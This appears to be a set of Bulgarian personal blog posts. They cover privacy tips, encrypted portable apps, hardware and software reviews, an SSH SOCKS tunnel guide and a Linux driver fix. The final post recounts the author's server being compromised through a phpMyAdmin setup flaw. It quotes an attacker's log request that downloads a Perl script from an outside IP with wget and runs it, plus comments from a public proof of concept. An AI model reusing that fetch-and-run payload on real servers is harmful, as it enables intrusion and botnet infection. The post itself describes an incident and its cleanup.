Да започнем с няколко лесни постановки:

1. Забравете IE.

Да. Знам, че много хора го използват, но това  не  е добра идея. Свалете си Firefox или Chrome или Opera (аз това съм ползвал и с това мога да ви дам съвети). Всеки от тези browser-и има едно малко предимство – “Анонимно сърфиране” (в FF) или “Инкогнито” (в Chrome), не знам как е в Opera, но и там знам, че има такова.

2. Поща.

Имам позната, която така си прави регистрациите, че никой не може да свърже името и с ника и. Регистрирала си е две пощи и ги използва за различни цели. Това не е лоша идея.

3. Лично пространство.

Макар вие да спазвате личното пространство на хората, които ползват вашия компютър, някой може и да не го прави, за това много внимавайте със снимките и като цяло информацията, която държите там. За предпочитане е да не държите нищо което могат да използват срещу вас или което може да навреди на някой. Лично при мен всички компромати са добре защитени или на криптирани дискове, или в криптирани контейнери от рода на обяснените по-късно.

4. Използвайте антивирусната и firewall-а както трябва

Една добре update-вана антивирусна и един добре конфигуриран firewall могат да ви спестят много проблеми.

5. Проверявайте работещия на машината software

Добре е да си пускате от време на време TaskManager-а или по добре да си сложите ProcessExplorer от Sysinternals пакета. Може да ви звучи на китайски, но скоро ще се научите кое не трябва да спирате и кое трябва.

6. Нямайте доверие никому!

Това е може би най-важната точка. Не позволявайте други хора да работят във вашия акаунт или с административни права на вашия компютър! Ако трябва да седнат им създайте един ограничен Guest акаунт и да се забавляват!

Това са основните правила, които трябва да спазвате. Има други, които ще подобрят нещата, но целта на този материал е да ви предпази от основните проблеми.

А сега да преминем към частта за напреднали (леко параноични).

Или както обичам да казвам: Елате приятели параноици!

1. Portable приложения.

Каква е идеята? Имате приложение/програма, която работи в така наречения sandbox или пясъчник – среда която е практически заделена само за това приложение и всичко което прави, го прави в пясъчника. Всички временни файлове, история, бисквитки, всичко – се пази в sandbox-a на програмата.

Пълен набор такива неща можете да намерите на www.portableapps.com

2. Криптиране

Помните ли старите програмки за заключване на папки? Е, това е малко по-добро – използвайки последните достижения на информатиката можете да направите непрочетими, заключени с парола части от работната си среда. Папки, флашки, дори цели дискове на компютри. Всичко.

3. Криптирани дискове + Potable Приложения

Какво ли общо могат да имат двете неща по-горе? Преносими приложения и криптиране …

Нека ви дам пример: Криптиран фаил, на флашка, пълен с пълния набор инструменти, програми, пароли и изобщо всичко което ви трябва за работа …

Как ли става?

Лесно.

(тук ще покрия работата с и създаването на тази среда само за Windows (ако сте стигнали до работа с Linux, сигурно знаете хитринки достатъчно за да се опазите))

Стъпка 1.

Сваляме FreeOTFE или FreeOTFE Explorer – и двете ги има в portable версия. (цък) и си създаваме криптиран контейнер с необходимата големина и силна парола. За това, ако желаете ще напиша отделно ръководство.

Стъпка 2.

Сваляме си необходимите програми. Skype. Firefox. Thunderbird … Каквото ви трябва … и си ги слагате във вече създадения контейнер.

Стъпка 3.

Слагате си контейнера и програмата за декриптиране (FreeOTFE или FreeOTFE Explorer) на една флашка или преносим диск и си ползвате тях. По този начин имате едно малко, виртуално швейцарско ножче, което от вън не изглежда на нищо.

4. Друга опция ( за много напреднали или много параноични)

Макар този начин да ви гарантира, че няма да оставите почти никакви следи, не е изключено системата на която сте да има закачени разни малки бубички, като keylogger-и, програми за снимане на десктопа и какви ли не още екстри. За да се предпазите от тези неща има един сигурен начин и това е операционна система на флашка и то само ако имате начин да накарате компютъра да стартира от нея. Има няколко готови Linux базирани проекти, които се инсталират лесно и не се различават чак толкова от средата с която сте свикнали да работите. Аз лично предпочитам Slax, но това е само защото съм гаден върл фен на Slackware.

В някой от следващите дни ще седна да напиша ръководство за използването на FreeOTFE и за създаването на Live дистрибуция, която да носите в джоба си.

Надявам се да съм ви бил полезен.

Ваш,

Lucifer

Един от най-големите ми проблеми при миграцията към Linux преди малко повече от две години (леле станаха ли толкова?) беше да си намеря правилните клиенти за услугите които ползвах и което е по-важно – да харесвам клиентите.

Koppete пасна идеално на ICQ, Facebook и GTalk.

Pidgin за XMPP Server-а, който поддържам.

Но намирането на правилния twitter клиент за под Linux беше трудно … докато не попаднах случайно на едно малко бижу наречено Choqok. Използвам го от версия 0.7 (последната версия е 1.1) и съм изключително доволен. Като цяло целта му е да е лек и удобен клиент за microblogging мрежи. Написан е е на QT (поне по-старите версии, сега видях че минават на GTK+), което означава, че приема общия вид и изглед на темата ви. Аз лично винаги съм си падал по минималистичният дизайн и за може би за това тази скромна на вид програмка ме грабна и се превърна в част от “задължителния софтуер”.

Това което предлага Choqok е основните и най-необходими функции за нормално използване на Twitter или повечето от micro-bloging мрежите за които предоставя функционалност:

• множество accounts в множество micro-blog мрежи (Twitter, identi.ca и др.)
• съкращаване на URL-и
• различни timelines – Приятели, @Спомеанвания, Inbox, Outbox
• oфициалния twitter ReTweet
• Upload на снимки в различни услуги
• интеграция с KWallet за запазване на паролите
• нотификация за получени tweet-ове
• глобални клавишни комбинации …

Като цяло програмката е идеалния клиент за хора харесващи минималистичния дизайн – целта е да е twitter клиент и си я изпълнява с пълна сила, без да bloat-ва с различни шарении или ненужни функции.

Ако, като мен, сте привързани към опростения вид или просто искате чисто функционален software – Choqok е точно за вас.

И след цялото това представяне, можете да намерите самата програма тук.

Choqok е FOSS (Free/Open Source Software), разпространяваща се под GNU GPL v.3 лиценз.

Надявам се да съм ви бил полезен.

Ваш,

Lucifer

Това смятам да е първия пост, от една надявам се дълга поредица. Имам намерение всяка сряда да пиша за собствения си досег с нещо … geek-ско. Било то телефони, софтуер, хардуер или каквото ми дойде на ум …

Май ми стана навик да тествам разни много маниашки неща.

Както споменах в статията за Marauder-a Васи ми даде няколко неща за проба. Освен Мародера, за да го видя как работи под Linux, получих и Razer Tron комплект, за да мога да се изкефя максимално …

Честно казано останах малко разочарован от комплекта на Tron. И мишката и клавиатурата са предназначени за маниаци на тема филма и играта, а аз както можете да се сетите не съм съвсем голям маниак, за това и оценката ми е по-скоро функционална от колкото нещо друго …

Но нека ги разгледаме по отделно.

Мишка Razer Tron с MousePad Tron

Първото нещо, което прави впечатление при докосването до комплекта е … опаковката! Самата опаковка е супер яка – оставаш с чувството, че мишката не трябва да се пипа, а само да се гледа в кутията … истинска красотичка. При отваряне на кутията, ракцията ми беше - УОУ! Като я пъхнеш в USB порта и светва, че и “зарежда” – чува се звук като от отваряне на LightCycle от филма. Дори самата мишка има форма на заветните моторчета. След първото “УОУ”! обаче, се заиграх със самата мишка. Мишката е много бърза (предполагам, че заради високото DPI (и да знам, че има настройки за скорост)) и в същия момент изключително лека. Самият аз съм свикнал мишката ми да се чувства в ръката ми, да тежи едни 100-150 гр. Самият аз използвам лазерна, безжична мишка, която има ергономична форма и много удобно приляга в ръката, и тежи достатъчно за да дава прецизност на движенията. Трон плъхчето, от своя страна е изключително леко, но си мисля, че това си е по-скоро въпрос на предпочитания. Също така и самият корпус не ми приляга толкова удобно колкото ми се иска …

Истинския eyecandy идва обаче, като сложиш мишката на подложката и намалиш светлината … МИШКАТА ОСТАВЯ СВЕТЛИННИ ДИРИ! Супер яко! (жалко, че имам предпочитание към по скромните дизайни). Поиграх си достатъчно с мишката, за да мога да ви кажа, че е супер красива.

Тук сигурно очаквате да ви обрисувам какви невероятни функции има самата мишка (като например промяна на цвета при някакво действие в играта, програмируеми бутони и тн), но за мое най-искрено съжаление продуктите на Razer нямат драйвери за Linux, за това и не успях да ги пробвам напълно, както ми се искаше …

Плюсове:

• Супер фенски дизайн
• Настройка на почти всичко което се сетите за мишката ((800, 1200, 1800, 4000 и 5600 DPI), sensetivity и тн.)(под Windows)
• Feedback
• EYECANDY!!! – оставяната светлинна диря е много яка!

Минуси (поне според мен):

• Липса на Linux драйвери
• Лекотата на самата мишка
• Дизайн на корпуса, който не е един от най-ергономичните

Клавиатурата Razer Tron

И за клавиатурата на Razer Tron, както и за мишката, първото което те грабва е опаковката! И тя, като плъхчето е опакована, за да бъде гледана. Самата клавиатура си е eyecandy от всякъде … сининички ленти навяват мисли за шеметни скорости … Едно хитро нещо, което прави впечатление е, че numpad частта е свободна и може да си я сложите от която страна си искате, което си е много много хитро. Самата клавиатура, както и мишката си имат подсветки, които им придават един чисто … Tron вид … И тя, на гледане обира точките … Изходи за слушалки и микрофон на самата клавиатура … абе красотичка …

И тук идва голямото “НО” – самата клавиатура е неудобна. Клавишите са раздалечени и много повече наподобяват копчета на терминал. Предполагам, че това е търсен ефект, но според мен са се престарали – самите клавиши се натискат и се усещат под пръстите като копчета. Писането е, меко казано, непривично, да не кажа, че е направо неудобно. Освен това са несвойски поставени … Аз съм човек с навици и сигурно, ако работя 3-4 дни на тази клавиатура ще свикна, но в един момент (след поредното “А” вместо “С” или “Caps Lock” вместо “Я”) предпочетох да се върна на клавиатурата на лаптопа. Същия ефект имаше и върху играта ми – използвах Trine, много приятен jump’n'run от Frost Bite bundle-то, но просто не успях да се справя с раздалечените клавиши и лекотата на мишката …

Плюсове:

• Фенски дизайн
• Сменям numpad
• Аудио IN и OUT на самата клавиатура
• Eyecandy
• Макроси (които не успях да пробвам поради Linux-a)

Моите лични минуси:

• Клавиши, които се усещат като бутони
• “Дизайнерско” разположение на клавишите

За накрая:

Дали бих си ги купил?

За мен лично – Не. Не мога да си представя да работя ежедневно на тях. Въпреки, че са фенски, аз имам нужда от функционалност.

Честно обаче са идеален подарък за всеки ваш приятел, който си умира за филмите или играта.

Надявам се лични ми досег с Razer Tron комплекта да ви е харесал, защото за мен беше нещо … специално …

Ваш,

Lucifer

Какво ви трябва?

PuTTY

SSH Shell някъде

Хубав browser (Firefox/Chrome/Opera)

Каква е целта?

Използвайки една малко известна функция на SSH създаваме връзка с shell-а, който може да е на всякъде (в моя случай – www.anavaro.com). После пренасочваме трафика през връзката и получаваме своебразен лесен VPN.

Как става?

Пускате PuTTY.

Задавате адрес за SSH сесията.

Отивате на Connections -> SSH -> Tunels.

Задавате Source port (в моя случай 8888)

Слагате отметките под Destination на Dynamic и Auto и давате Add

Свързвате се с shell-а, пишете си user-а и паролата

И вече имате тунел през който да пренасочите трафика си.

Сега тънката част – Browser-а

Тук ще спомена, че по принцип всеки Browser може да се използва, всеки който има възможности да ползва proxy. Защо споменах горните 3 ще разберете по-късно.

За Firefox:

Tools -> Options -> Advanced -> Network -> Settings

Там избирате Manual Proxy Configuration и в SOCKS Host слагате 127.0.0.1, а за порт – порта който сте си избрали по рано.

От тук на сетне целия трафик ще минава през отворената с PuTTY сесия …

Тук идва въпроса – АМИ DNS ЗАЯВКИТЕ? Защото той трафика си минава през secure връзката, но сайтовете се резолвват през DNS.

В адресната линия пишете “about:config”. Намирате си опцията “etwork.proxy.socks_remote_dns” и я правите на TRUE et voila …

За Chrome:

Отново като за Firefox сменяте proxy-то, но слагането на secure DNS е малко по-сложно:

1. Добавяте към shortcut-а на Chrome

--proxy-server=socks5://127.0.0.1:8888

2. от настройките отивате на Under the hood и махате опцията “Use DNS pre-fetching to improve page load performance”

и готово! Имате си secure връзка.

А какво правите, ако сте като мен – под Linux?

Дори още по-лесно:

В някоя конзола пускате следния ред:

$ ssh -D 8888 user@host

И правите същите настройки на browser-а като за Windows …

Това SOCKS5 Proxy може да използвате и с повеето чат клиенти, за да си прекарате връзката през него (Skype и Koppete знам със сигурност, че имат proxy options)

Надявам се това да ви е помогнало!

Ваш,

Lucifer

Kernel-а който излезе на 9-ти беше 2.6.32.3 и разбира се първата ми работа беше да го инсталирам, да го прекомплирам за да открива и 4-те GB RAM и да си направя initrd.gz за да мога да си пускам машината (аз съм гаден параноик и съм я криптирал)  …

Всичко мина добре. Влязох като root и махнах стария fglrx.9.12 компилиран за 2.6.29.6.

Стартирах инсталатора … и каква беше изненадата ми, когато вместо “Instalation complete”, получих съобщението “There were errors compiling driver. Please refer to fglrx-install.log”

WTF??? Какви грешки бе!

nano /usr/share/ati/fglrx-install.log

[Message] Kernel Module : Trying to install a precompiled kernel module.
[Message] Kernel Module : Precompiled kernel module version mismatched.
[Message] Kernel Module : Found kernel module build environment, generating kernel module now.
AMD kernel module generator version 2.1
doing Makefile based build for kernel 2.6.x and higher
rm -rf *.c *.h *.o *.ko *.GCC* .??* *.symvers
make -C /lib/modules/2.6.32.3-smp/build SUBDIRS=/lib/modules/fglrx/build_mod/2.6.x modules
make[1]: Entering directory `/usr/src/linux-2.6.32.3'
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/firegl_public.o
In file included from /lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:443:
/lib/modules/fglrx/build_mod/2.6.x/drm_proc.h: In function ‘FGLDRM__vma_info’:
/lib/modules/fglrx/build_mod/2.6.x/drm_proc.h:497: warning: format ‘%08lx’ expects type ‘long unsigned int’, but argument 5 has type ‘phys_addr_t’
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c: In function ‘KCL_MapPageToPfn’:
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:1586: warning: unused variable ‘bus_addr’
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_acpi.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_agp.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_debug.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_ioctl.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_io.o
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c: In function ‘KCL_IO_FASYNC_Terminate’:
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c:122: error: ‘SIGIO’ undeclared (first use in this function)
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c:122: error: (Each undeclared identifier is reported only once
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c:122: error: for each function it appears in.)
make[2]: *** [/lib/modules/fglrx/build_mod/2.6.x/kcl_io.o] Error 1
make[1]: *** [_module_/lib/modules/fglrx/build_mod/2.6.x] Error 2
make[1]: Leaving directory `/usr/src/linux-2.6.32.3'
make: *** [kmod_build] Error 2
build failed with return value 2
[Error] Kernel Module : Failed to compile kernel module - please consult readme.

Какво по …

И отново старото ровене в чичо google … 2 дни без хубаво видео … няма да ви описвам мъките си … докато на някакъв забит пост в някакъв забит форум не намерих как да го оправя … а то се оказа и много просто – явно в новата ядро са отделили част от нещата в нов header file …

Ето и решението step-by-step:

01. Сваляте си драйверите от сайта на ATI.
02. Стартирате run-а с опция –extract
03. Отваряте fglrx-install.nqkakuv_string/common/lib/modules/fglrx/build_mod/kcl_io.c където добавяте:

#include <linux/signal.h>

04. В fglrx-install.nqkakuv-string стартирате sh ./ati-installer.sh 8.5912 –install
05. reboot … and that is all …

Лесно нали? Някъде из нет-а се мотат готови .patch, но нямах време и желание да търся … за това използвах nano … и го направих на ръка … лесно и бързо … веднъж като знаеш какво ти трябва …

Надвявам, се да помогна на някого.

Ваш,

Lucifer

Звъня аз на оператор …

Операторката: Виваком. Говорите с …

АЗ(след 5 минути on hold): Добър вечер. Имам глупав въпрос. Случайно да поддържате e-mail към SMS услигата?

Девойката: Аааа. … не знам … изчакайте за момент на линия да попитам.

(пратен съм пак on hold)

Девойката: Не господине, не предлагаме тази услуга.

АЗ: Добре, а има ли някакъв начин да пращам SMS от интернет?

Девойката: Да, господине … от сайта на Виваком.

АЗ: А има ли някакво API или нещо което да автоматизира процеса?

Девойката: Моля? Не ви разбрах?

(Свикнал съм да не ме разбират)

АЗ: Добре. Няма значение, благодаря ви.

***

Тази ситуация, както се досещате никак не ми харесва … ама никак! Та решавам въпреки това да пробвам.

Преравям интернета и виждам как са дефинирани адресите на другите 2 Български мобилни оператора …

Логвам се в мейл-а си.

359878хххххх[at]sms.vivacom.bg

Пращам …

Звънн на GSM-а -> ИМАТЕ SMS от …

DEAMN YOU!!!

Звъня пак на оператор …

***

Девойката: Свързахте се с Виваком. Говорите с …

АЗ: Добър вечер. Я да ви питам – заплащам ли SMS-ите, които получавам от mail2sms gatway-а ви?

Девойката: А? Не ви разбрах?

АЗ: Заплащам ли SMS-ите които получавам от електронната си поща?

Девойката: Имате предвид новата ни услуга Nokia Messeging ли?

АЗ: Не. Нямам предвид push mail услугата ви… Имам предвид mail2sms gateway-a … Няма значение … Бихте ли ми казали дали заплащам SMS-те пристигащи от номер …

Девойката: Сега ще проверя, господине …

(On hold за 20 минути)

Девойката: Съжалявам за забавянето, но …

АЗ: … ви хвърлих в Jazz-a?

Девойката: Да. До колкото разбрах не предлагаме такава услуга …

АЗ: От мене да знаете, че предлагате … Въпроса е дали си плащам.

Девойката: Не знам, господине …

АЗ: Добре … имате достъп до таксуванията на номера ми, нали?

Девойката: Да?

АЗ: Отворете ги.

Девойката: Дайте си номера …

АЗ: 0878хххххх

Девойката: Но те се опресняват на 3 часа, господине … Последното ви е от 11:10 … ползване на интернет.

АЗ: Добре … показва ли се кога съм говорил с оператор?

Девойката: Да, господине. Провели сте разговор в 19:35 …

АЗ: След това не съм таксуван, нали?

Девойката: Не, господине.

АЗ: Добре, значи системата ви се е опреснила … щом е отчела обаждането на оператор и след него не съм таксуван, следователно не ме таксувате за тези SMS-и …

Девойката: Логиката ви е безупречна господине … но отново ви казвам, че не предлагаме такава услуга …

АЗ: А от мен  да знаете … че всъщност предлагате … Благодаря ви и лека вечер!

***

Много се забавлявам понякога в Вивакомци … Много са ми забавни … Поддръжката им явно има някакъв минимален запас от познания и им е трудно да импровизират върху тях …

Ваш,

Lucifer

То бива бива да съм заблуден, ама като мене не бива. Ситуацията на кратко – сървъра ми беше хакнат! Дап, моето мило Анаваро!

Беше заразен с IRC бот вирус. Нямаше много “мрежеви” поражения … защото машината слаба или аз съм я сложил калпаво, та вируса само се изпълняваше, вдигаше CPU-то на 100% и системата умираше – няма мрежа, няма нищо, а аз знаете съм на 500 км.

След няколко рестарт-а и любимите ми “tail -f” и “htop” успях да засека следния малък проблем:

ID    USER    NI  CPU%  MEM%   VIRT    SHR   S  TIME+     Command
3813  apache  0   65.0    0.1       1776   432    R   1:42.64   ./std 89.137.139.225 0

А … ново 20??? Какъв пък процес се изпълнява от apache (Web Server-a) …

Спомних си кога за първи път се появи проблема и се зарових из логовете на индианеца … където открих следния “смахнат” ред:

88.191.14.38 - - [29/Nov/2009:02:12:10 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20http://88.170.72.136/gcc.txt;lwp-download%20http://88.170.72.136/gcc.txt;fetch%20http://88.170.72.136/gcc.txt;perl%20gcc.txt;rm%20-fr%20gcc.txt HTTP/1.1" 200 181

Изненадкааа …Разбира се разпищях се из Linux-bg и ми върнаха лошата за мен новина:

# PoC script successfully tested on the following targets:

# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1

# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:

# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5

# and 3.x before 3.1.3.1 according to PMASA-2009-3

# 2) it *seems* this vuln can only be exploited against environments

# where the administrator has chosen to install phpMyAdmin following

# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx

# 3) administrator must have NOT deleted the ‘/config/’ directory
# within the ‘/phpMyAdmin/’ directory. this is because this directory is
# where ‘/scripts/setup.php’ tries to create ‘config.inc.php’ which is where
# our evil PHP code is injected

Бах! Как се саморазпосувах, само може да си представите! Правих какви ли не магарии – то не бяха преинсталации на apache, промени на пътеки …

Отново и отново ./std $IP $PORT процеса ме убиваше …

Питайки чичко Гугъл … случайно стигнах до един сайт в който някой се оплакваше от моя проблем.

ps aux | grep apache

ми даде виновника – индианеца се беше троянизирал … изпълняваше процеси (добре че е deamon) …

crontab -u apache -e

ми даде и проблема – някакво фаилче кръстено y2kupdate в /tmp/.pid/ и изпълнимо … на бързо му бих “rm -r”, премахнах референцията в cron-а и изтрих phpMyAdmin-a (сложих си го на скрито място) …

Знам, че съм пълен идиот … ама аз съм си такъв …

Ваш,

Lucifer